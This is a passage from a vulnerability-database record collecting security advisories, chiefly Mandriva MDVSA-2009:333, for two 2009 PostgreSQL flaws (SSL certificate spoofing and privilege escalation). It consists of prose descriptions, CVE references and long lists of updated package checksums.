perform a man in the middle attack to view sensitive information or alter encrypted communications. (CVE-2009-4034)\n\nIt was discovered that PostgreSQL did not properly manage session-local state. A remote authenticated user could exploit this to escalate priviliges within PostgreSQL. (CVE-2009-4136)", "modified": "2010-01-03T00:00:00", "published": "2010-01-03T00:00:00", "id": "USN-876-1", "href": "https://usn.ubuntu.com/876-1/", "title": "PostgreSQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "SSL certificate spoofing, privilege escalation.", "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "SECURITYVULNS:VULN:10473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10473", "title": "PostgreSQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:333\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : postgresql\r\n Date : December 15, 2009\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and corrected in postgresql:\r\n \r\n NULL Bytes in SSL Certificates can be used to falsify client or server\r\n authentication. This only affects users who have SSL enabled, perform\r\n certificate name validation or client certificate authentication,\r\n and where the Certificate Authority (CA) has been tricked into\r\n issuing invalid certificates. The use of a CA that can be trusted to\r\n always issue valid certificates is recommended to ensure you are not\r\n vulnerable to this issue (CVE-2009-4034).\r\n \r\n Privilege escalation via changing session state in an index\r\n function. This closes a corner case related to vulnerabilities\r\n CVE-2009-3230 and CVE-2007-6600 (CVE-2009-4136).\r\n \r\n Packages for 2008.0 are being provided due to extended support for\r\n Corporate products.\r\n \r\n This update provides a solution to these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136\r\n http://www.postgresql.org/support/security\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 7a4134b7ab1675be4c53ff6b4922d7e0 2008.0/i586/libecpg5-8.2.15-0.1mdv2008.0.i586.rpm\r\n b8fe1351d19899fbca1a67929b0b4be7 2008.0/i586/libecpg-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n e86a98de348ba90bc6a1f16f02daa6e1 2008.0/i586/libpq5-8.2.15-0.1mdv2008.0.i586.rpm\r\n 551363cff118bee0b87dd827dddce669 2008.0/i586/libpq-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n ef3c1b9a831fedf1399f8b72cd65f748 2008.0/i586/postgresql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d308631e61cd6236e40827b78c9c2951 2008.0/i586/postgresql8.2-8.2.15-0.1mdv2008.0.i586.rpm\r\n f8e97d697f69e43dc4bb2a96e64600cd 2008.0/i586/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.i586.rpm\r\n 863015525b015c812f963a2af63fc7dd 2008.0/i586/postgresql8.2-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6340e0530e254732d654d8f6211d5198 2008.0/i586/postgresql8.2-docs-8.2.15-0.1mdv2008.0.i586.rpm\r\n e098dee5477edb0b7549b65ddb440cb5 2008.0/i586/postgresql8.2-pl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 05cda82443737a12c7c8c3622e762618 2008.0/i586/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6a66bc2cc80538a4db3e44ca97740a7f 2008.0/i586/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d01866d6fa8d18865e8f47744d0053bd 2008.0/i586/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.i586.rpm\r\n 0e250c776673c8595ed4f57194ceff15 2008.0/i586/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.i586.rpm\r\n f69196c2af80f25abaae6cdb5273a985 2008.0/i586/postgresql8.2-server-8.2.15-0.1mdv2008.0.i586.rpm\r\n 5c96b2bdfdb5f4b23280de184d76bb4c 2008.0/i586/postgresql8.2-test-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6c203c33bef69b8f676d1acd782d3526 2008.0/i586/postgresql-devel-8.2.15-0.1mdv2008.0.i586.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n ef654ee6768a32df7021cb7c1b95151d 2008.0/x86_64/lib64ecpg5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4272c2616fce89a650e102effb3e2427 2008.0/x86_64/lib64ecpg-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a45cc8104b4758913384375c6f9d993b 2008.0/x86_64/lib64pq5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a5beab729e5e4c04374f44b8ed0e7c0d 2008.0/x86_64/lib64pq-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n bc9a43e16b3fe38c26011f76e6e796ea 2008.0/x86_64/postgresql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 632cc2bd4f2d099de6f18cc5a4ed28b9 2008.0/x86_64/postgresql8.2-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n da76130aeaec4d962904ed0c2c566c63 2008.0/x86_64/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 9061e32e63cc8dfc68a393dc986b6b92 2008.0/x86_64/postgresql8.2-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 2d88f5b268d6661771fd76eccbca7f82 2008.0/x86_64/postgresql8.2-docs-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 46a1f1beb87d1a3618470b5a1427b53d 2008.0/x86_64/postgresql8.2-pl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a8126282c514a3b22736c6bf2d3ca570 2008.0/x86_64/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 5aada115ff9cd3c44cd9032d88bd93c4 2008.0/x86_64/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4c9433b70a16300a304ee04b3aeb7abe 2008.0/x86_64/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n cf01e27ebed1d7541c7dfe9fe7eaec20 2008.0/x86_64/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 16fe157d591066b6c7bd12ef79c78972 2008.0/x86_64/postgresql8.2-server-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n c5b58224e6becb9334cd555747fd040e 2008.0/x86_64/postgresql8.2-test-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 0e826718d8fe8571618ffdff6304b9d9 2008.0/x86_64/postgresql-devel-8.2.15-0.1mdv2008.0.x86_64.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n eb4c7ac210259c34ce96873fa11cdd7b 2009.0/i586/libecpg8.3_6-8.3.9-0.1mdv2009.0.i586.rpm\r\n ea79f082d51e575072e22e3f37705e76 2009.0/i586/libpq8.3_5-8.3.9-0.1mdv2009.0.i586.rpm\r\n 21dda67f89a7291aa530bdc0b04b3893 2009.0/i586/postgresql8.3-8.3.9-0.1mdv2009.0.i586.rpm\r\n 09d1a7d4bcad3b754772e03bfdd85768 2009.0/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.i586.rpm\r\n ec004d65e57abb94a1c40ebd0e8b0a24 2009.0/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.0.i586.rpm\r\n cae8230c899fd71fd28fc3baaa983e95 2009.0/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.0.i586.rpm\r\n e9a46436f40e44e2b4757b6ee2db2dc3 2009.0/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.0.i586.rpm\r\n edc0dcc12a27a2166f8e14f147f8540d 2009.0/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1c8b6afc908d4e0037085b2b275b0893 2009.0/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.i586.rpm\r\n f0a4b90047b26f6de9c0c5475ede00e8 2009.0/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1bbd1b65ed0b65a62963eaccb8008666 2009.0/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 27124329934314f3f73571e83e5fdaf3 2009.0/i586/postgresql8.3-server-8.3.9-0.1mdv2009.0.i586.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 6aa7262c7041f8fb039a8031965a6a71 2009.0/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 61af7c606839a7fff0ff56991dfd7021 2009.0/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 2ff4745b162e6b4234862b1b2fcd315f 2009.0/x86_64/postgresql8.3-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 50d9eaffaf04beea769d22e058a1f2a8 2009.0/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n d9fe796fce569179e8e99ae74a63af76 2009.0/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 980a800e9ac2a0890d24ae0e843fd6e0 2009.0/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 27334694d9da6e19904c8198d7f6ef43 2009.0/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 68f2566b2de77da452d4b8043cf8a0de 2009.0/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 31c3643e58947d76207345d8e82a6483 2009.0/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 8e342cf436ed4bd6ea61244bca980054 2009.0/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 30ba385a932cf752cfd85dd3a0833c40 2009.0/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n e1253c9933f47db51ecd7edc825a703e 2009.0/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.0.x86_64.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 91a80a39b17253f9321f325979afff81 2009.1/i586/libecpg8.3_6-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b27f7064a9b75d50d54e3d782ccea54 2009.1/i586/libpq8.3_5-8.3.9-0.1mdv2009.1.i586.rpm\r\n 62da0a6d0030c98fd608a33fb123456c 2009.1/i586/postgresql8.3-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7c7dede7142fd2e3ed2ebdb3c519b623 2009.1/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.i586.rpm\r\n 345e475a35916f7416d4f8b0bf75436b 2009.1/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.1.i586.rpm\r\n 97a70a0872a839f83a2739eaed6607a9 2009.1/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.1.i586.rpm\r\n 0eed7e9ebefdddcaf27e42d33629dabf 2009.1/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 61952d53ebee9a18a5cf9a10988c4fa3 2009.1/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 9cdd01198d4d25ef569cc081c411c050 2009.1/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b9ba830df3a61827eab05cfada3f09b 2009.1/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.i586.rpm\r\n 42fb3e9486162d383bc67d24eb613b1f 2009.1/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.i586.rpm\r\n db31dcac659eed1a48ee714125c61e78 2009.1/i586/postgresql8.3-server-8.3.9-0.1mdv2009.1.i586.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n c803bc340e21af79f5745df0fee8aead 2009.1/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 616b2b6f79a848fe57410af986c81bda 2009.1/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 877e5894da539e59805469d16dfda370 2009.1/x86_64/postgresql8.3-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n be3ece7cf5ae31d25dc365389b4e8334 2009.1/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n c58f7bf0768b22f5ff229c5cfd4c5f52 2009.1/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n f3252fd034dcf0a47552b78439fccd4a 2009.1/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 1b425723f71982812ebf429188cb88da 2009.1/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 5b463c7748dcc5fae7b1e7443ee75694 2009.1/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 70d521df18f5fbfffe7073b95a614ff8 2009.1/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 33a607815a4da55a66101fd13062477e 2009.1/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 508aae591f0f59aecde2f4212416a45c 2009.1/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 8b8f650803166b84ba3a3ff4c538ab89 2009.1/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.1.x86_64.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 1869824366c51ebb0b55055426bd2c53 2010.0/i586/libecpg8.4_6-8.4.2-0.1mdv2010.0.i586.rpm\r\n 2bb29a6b0aaa2d556b6c9d5b86a6fac2 2010.0/i586/libpq8.4_5-8.4.2-0.1mdv2010.0.i586.rpm\r\n 234ea96d6f15028e48fb4d67ba8e3dc0 2010.0/i586/postgresql8.4-8.4.2-0.1mdv2010.0.i586.rpm\r\n c044f451d83daa297d1b6bea592c5759 2010.0/i586/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.i586.rpm\r\n 33167e61bf2e5f8132e581306fb3f9b3 2010.0/i586/postgresql8.4-devel-8.4.2-0.1mdv2010.0.i586.rpm\r\n 52c063f6a31ef49b87fe70227e1cc7a1 2010.0/i586/postgresql8.4-docs-8.4.2-0.1mdv2010.0.i586.rpm\r\n dc75e2ebbab59312d6c1a491b6393f91 2010.0/i586/postgresql8.4-pl-8.4.2-0.1mdv2010.0.i586.rpm\r\n a44bac65b39698446f4d066f77cd3085 2010.0/i586/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.i586.rpm\r\n 9537965ff95b6d6c62be3df17567f6c9 2010.0/i586/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.i586.rpm\r\n 32b66a3d2d191bf52ad1770ce92a24bd 2010.0/i586/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.i586.rpm\r\n a45380a8bc2072792ab52042db3a837c 2010.0/i586/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.i586.rpm\r\n b99ffb5c3cbb7266b63986b075b0eb95 2010.0/i586/postgresql8.4-server-8.4.2-0.1mdv2010.0.i586.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 864f7b0ab419b1c08fdbff5af593a9e3 2010.0/x86_64/lib64ecpg8.4_6-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 707a9ed081a46bea0cec38bd2bfe3561 2010.0/x86_64/lib64pq8.4_5-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n e3aa48ed1d6da44aaf791be57619043d 2010.0/x86_64/postgresql8.4-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 874e5a9ab5757e0d9c509eee102c0dc2 2010.0/x86_64/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 90627e1bdc5988d3a78ee16491a27148 2010.0/x86_64/postgresql8.4-devel-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cf905e15179fe18fa68ae02f35713139 2010.0/x86_64/postgresql8.4-docs-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 8e6957a4ca67801131ee70dbe4f3639a 2010.0/x86_64/postgresql8.4-pl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 1b1e5de5c77a30672ea9bba9d49d7bed 2010.0/x86_64/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n b87c3d4cd820d21eac3e66559d773508 2010.0/x86_64/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cfcaf767fb6135169e3fb01704e2831e 2010.0/x86_64/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n fd216fa6f5ecb1fa1d8f6429396b4142 2010.0/x86_64/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 9c86fd1c896343e5c48b76aed566f8c8 2010.0/x86_64/postgresql8.4-server-8.4.2-0.1mdv2010.0.x86_64.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 8a71295ef109fe3ab7260170384c0ce7 corporate/3.0/i586/libecpg3-7.4.27-0.1.C30mdk.i586.rpm\r\n 11ef4350d665b4b2ef2fd926bd560aa8 corporate/3.0/i586/libecpg3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 30c8a894b12b223ad491abd4547c1fd7 corporate/3.0/i586/libpgtcl2-7.4.27-0.1.C30mdk.i586.rpm\r\n 0fa521cc9af217d927ca79c91b0c9eae corporate/3.0/i586/libpgtcl2-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 3672fefda6db5e828c7d939a27314b38 corporate/3.0/i586/libpq3-7.4.27-0.1.C30mdk.i586.rpm\r\n 9a2ba43d5dc9593ca1bbab4647208080 corporate/3.0/i586/libpq3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 2247db07ed8b627fbfc35ac648c2a5df corporate/3.0/i586/postgresql-7.4.27-0.1.C30mdk.i586.rpm\r\n e616a70f043ff0b0482e87d56a1019cd corporate/3.0/i586/postgresql-contrib-7.4.27-0.1.C30mdk.i586.rpm\r\n 08f9f7e7f8fb429cf0c77cfa7eda23d3 corporate/3.0/i586/postgresql-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 6d3b0ed2ba2b362ac09db9c4ae07b9e2 corporate/3.0/i586/postgresql-docs-7.4.27-0.1.C30mdk.i586.rpm\r\n 69b5e9674499b805b8e27bb6c348feec corporate/3.0/i586/postgresql-jdbc-7.4.27-0.1.C30mdk.i586.rpm\r\n 392426960dd9831613903d460af31b80 corporate/3.0/i586/postgresql-pl-7.4.27-0.1.C30mdk.i586.rpm\r\n c266e60a60a5c438dddd9fc3a9e86415 corporate/3.0/i586/postgresql-server-7.4.27-0.1.C30mdk.i586.rpm\r\n 7195e1843ccacf58dd3a8e6888f52687 corporate/3.0/i586/postgresql-tcl-7.4.27-0.1.C30mdk.i586.rpm\r\n d5a7dacb4bbb6d35d0eac00f8fb3fe8f corporate/3.0/i586/postgresql-test-7.4.27-0.1.C30mdk.i586.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n ca3ea7496d9340c6bc7466e478a821ff corporate/3.0/x86_64/lib64ecpg3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0ede7c61f0595bff37777971a2e2d3ac corporate/3.0/x86_64/lib64ecpg3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n a798bef9e8f689aed42f1317f59fb189 corporate/3.0/x86_64/lib64pgtcl2-7.4.27-0.1.C30mdk.x86_64.rpm\r\n c5fbbf4818f054ad11be80dad96c2e2f corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e89bb5fa7f482af3779d4508ccdc0f90 corporate/3.0/x86_64/lib64pq3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 43966e84c38f69cf644e05f86bb157b9 corporate/3.0/x86_64/lib64pq3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 7821bd199a8e957f862d2e6751f9993b corporate/3.0/x86_64/postgresql-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 3b7c354b1438fbf7e5613ec4b9525144 corporate/3.0/x86_64/postgresql-contrib-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 1271e5de07e40e7ef5d0b39ad4593cd8 corporate/3.0/x86_64/postgresql-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 17a2e21ba705128bc6dc234fa9222269 corporate/3.0/x86_64/postgresql-docs-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 284c5e6b3bc707509767df7ec5940915 corporate/3.0/x86_64/postgresql-jdbc-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0b3d675d0991c98ea6b2a665eb587c29 corporate/3.0/x86_64/postgresql-pl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 742086f186cd02ce6e010aa5b0efcde4 corporate/3.0/x86_64/postgresql-server-7.4.27-0.1.C30mdk.x86_64.rpm\r\n d5875f42122d0a021b1ae474a3c71de4 corporate/3.0/x86_64/postgresql-tcl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e4eeed326ce8f6a6cd14d955c9af1c3b corporate/3.0/x86_64/postgresql-test-7.4.27-0.1.C30mdk.x86_64.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n f16a9d7c219db91a48f05d47fbb25328 corporate/4.0/i586/libecpg5-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 46e5cba337eb64ebd722f1cf20a1bea0 corporate/4.0/i586/libecpg5-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n aa1bf8fa60ba634f847ef99743b54509 corporate/4.0/i586/libpq4-8.1.19-0.1.20060mlcs4.i586.rpm\r\n c9b495e705a47e8c657fe486c6a73caa corporate/4.0/i586/libpq4-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 8576e546f41ec07302b09f22b800c2a3 corporate/4.0/i586/postgresql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 99c18cea6a827b10c4197dea71660714 corporate/4.0/i586/postgresql-contrib-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 7a4ac00898e262a29c945ea24381a02c corporate/4.0/i586/postgresql-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n e10dde94402ce28c56d0a59f449b2120 corporate/4.0/i586/postgresql-docs-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 2b0aaa02c58d5f75be11b93663ac2db2 corporate/4.0/i586/postgresql-pl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 898ffb6afa67a42abd8cbd415f20f12d corporate/4.0/i586/postgresql-plperl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 750c34d0bd6c1370a10f65b0fe0d042f corporate/4.0/i586/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0e2fae96fe4ae65e119ec57bc62d1c18 corporate/4.0/i586/postgresql-plpython-8.1.19-0.1.20060mlcs4.i586.rpm\r\n ddfb7d5dcb55d11ca58c59072c96ffd8 corporate/4.0/i586/postgresql-pltcl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0ff2a52751ddf2c15ab718e378864209 corporate/4.0/i586/postgresql-server-8.1.19-0.1.20060mlcs4.i586.rpm\r\n dbd24a627e161243ace369ed2bd0cb59 corporate/4.0/i586/postgresql-test-8.1.19-0.1.20060mlcs4.i586.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ff727efb618417699e1d702c463c08ff corporate/4.0/x86_64/lib64ecpg5-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d9d0a5ed50a5ea130ec32fe942f58c90 corporate/4.0/x86_64/lib64ecpg5-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 64c1ae194c06762d74dc69105a16a6d3 corporate/4.0/x86_64/lib64pq4-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 5ff5e5660fa8e69fdabc2ec56fb41f33 corporate/4.0/x86_64/lib64pq4-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d92641b17c40ac1237651577a716d716 corporate/4.0/x86_64/postgresql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n c1a90670f7443af7ae03ddd89fe8ff86 corporate/4.0/x86_64/postgresql-contrib-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81907fd64a64793480a155ce04b7c8c1 corporate/4.0/x86_64/postgresql-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a1b78b2902098f4e2981deb47c14705f corporate/4.0/x86_64/postgresql-docs-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n e3ed9cee0ba6f35ba20bcc593059dfc9 corporate/4.0/x86_64/postgresql-pl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a4302fcb3ff0a03be6eadc2fa87e7772 corporate/4.0/x86_64/postgresql-plperl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81df2078a490b8f7944e14947172a3cb corporate/4.0/x86_64/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 33e8b703accdaf358014a4f4b9f20edf corporate/4.0/x86_64/postgresql-plpython-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a7d0b24be375bf699a16d856872ed3b0 corporate/4.0/x86_64/postgresql-pltcl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 124bb9309c4bcb6174703c933e81fdf8 corporate/4.0/x86_64/postgresql-server-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a63ab9b6d993eb50e5b437592423dfe7 corporate/4.0/x86_64/postgresql-test-8.1.19-0.1.20060mlcs4.x86_64.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 7954b4d7b6b3ad3a4dc075a63503e1d0 mes5/i586/libecpg8.3_6-8.3.9-0.1mdvmes5.i586.rpm\r\n 1631a58bfb19765fa166f6e507e9799b mes5/i586/libpq8.3_5-8.3.9-0.1mdvmes5.i586.rpm\r\n 643f5cada4cb4dbf53e7931a88be3f33 mes5/i586/postgresql8.3-8.3.9-0.1mdvmes5.i586.rpm\r\n c14326f783c2a1f5b90ea623e00e95bf mes5/i586/postgresql8.3-contrib-8.3.9-0.1mdvmes5.i586.rpm\r\n 4e1c3db6f801090ab60b31028fbfaa18 mes5/i586/postgresql8.3-devel-8.3.9-0.1mdvmes5.i586.rpm\r\n c36fcbf4195dbf7becd7c3dabf81e20b mes5/i586/postgresql8.3-docs-8.3.9-0.1mdvmes5.i586.rpm\r\n 524d653e230fbac674e9ce464d290b89 mes5/i586/postgresql8.3-pl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9877115225ad4463430d7e0bf6debebd mes5/i586/postgresql8.3-plperl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9bf0e1591576271129b01f4f0bd60b9e mes5/i586/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.i586.rpm\r\n b64538f411412f4025471fcad1ce24c8 mes5/i586/postgresql8.3-plpython-8.3.9-0.1mdvmes5.i586.rpm\r\n 3f9499776b4395c5829c761daa952976 mes5/i586/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.i586.rpm\r\n 2f8625a2f70355715b426be163316c8c 